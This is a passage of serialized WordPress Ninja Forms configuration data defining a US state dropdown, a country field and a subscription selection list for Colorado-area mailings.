Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:38;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"Pennsylvania\";s:5:\"value\";s:2:\"PA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:39;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"Rhode Island\";s:5:\"value\";s:2:\"RI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:40;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"South Carolina\";s:5:\"value\";s:2:\"SC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:41;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"South Dakota\";s:5:\"value\";s:2:\"SD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:42;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Tennessee\";s:5:\"value\";s:2:\"TN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:43;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Texas\";s:5:\"value\";s:2:\"TX\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:44;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Utah\";s:5:\"value\";s:2:\"UT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:45;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Vermont\";s:5:\"value\";s:2:\"VT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:46;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Virginia\";s:5:\"value\";s:2:\"VA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:47;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Washington\";s:5:\"value\";s:2:\"WA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:48;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"West Virginia\";s:5:\"value\";s:2:\"WV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:49;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Wisconsin\";s:5:\"value\";s:2:\"WI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:50;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Wyoming\";s:5:\"value\";s:2:\"WY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:14:\"listselect_316\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:5:\"State\";s:9:\"field_key\";s:14:\"listselect_316\";}s:2:\"id\";i:227;}i:5;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:11:\"listcountry\";s:6:\"def_id\";s:2:\"13\";s:5:\"label\";s:7:\"Country\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:2:\"US\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:24:\"country_use_custom_first\";s:1:\"0\";s:20:\"country_custom_first\";s:0:\"\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:2:\"US\";s:7:\"options\";a:0:{}s:3:\"key\";s:15:\"listcountry_317\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:7:\"Country\";s:9:\"field_key\";s:15:\"listcountry_317\";s:5:\"value\";s:2:\"US\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:228;}i:6;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:15:\"listmultiselect\";s:5:\"label\";s:113:\"Choose your subscription(s) - <span style=\"font-size:12px\"><i> (Hold CTRL key for multiple selections)</i></span>\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:5:\"multi\";s:10:\"multi_size\";s:1:\"4\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:3:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:16:\"Colorado Springs\";s:5:\"value\";s:16:\"Colorado Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:39:\"Central Colorado/ECK Temple in Colorado\";s:5:\"value\";s:39:\"Central Colorado/ECK Temple in Colorado\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 